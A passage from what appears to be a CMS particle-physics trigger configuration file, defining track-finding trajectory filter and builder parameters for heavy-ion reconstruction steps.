maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutLoose = cms.PSet( value = cms.double( 1620.0 ) )
HLTPSetDetachedQuadStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA = cms.PSet(
ComponentType = cms.string( "StripSubClusterShapeTrajectoryFilter" ),
subclusterCutSN = cms.double( 12.0 ),
trimMaxADC = cms.double( 30.0 ),
seedCutMIPs = cms.double( 0.35 ),
subclusterCutMIPs = cms.double( 0.45 ),
subclusterWindow = cms.double( 0.7 ),
maxNSat = cms.uint32( 3 ),
trimMaxFracNeigh = cms.double( 0.25 ),
maxTrimmedSizeDiffNeg = cms.double( 1.0 ),
seedCutSN = cms.double( 7.0 ),
layerMask = cms.PSet(
TOB = cms.bool( False ),
TIB = cms.vuint32( 1, 2 ),
TID = cms.vuint32( 1, 2 ),
TEC = cms.bool( False )
),
maxTrimmedSizeDiffPos = cms.double( 0.7 ),
trimMaxFracTotal = cms.double( 0.15 )
)
HLTPSetInitialStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.6 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterInOutPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOutPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterBasePreSplittingForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterPreSplittingForFullTrackingPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingForFullTrackingPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetInitialStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 2.8 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOutForFullTrackingPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
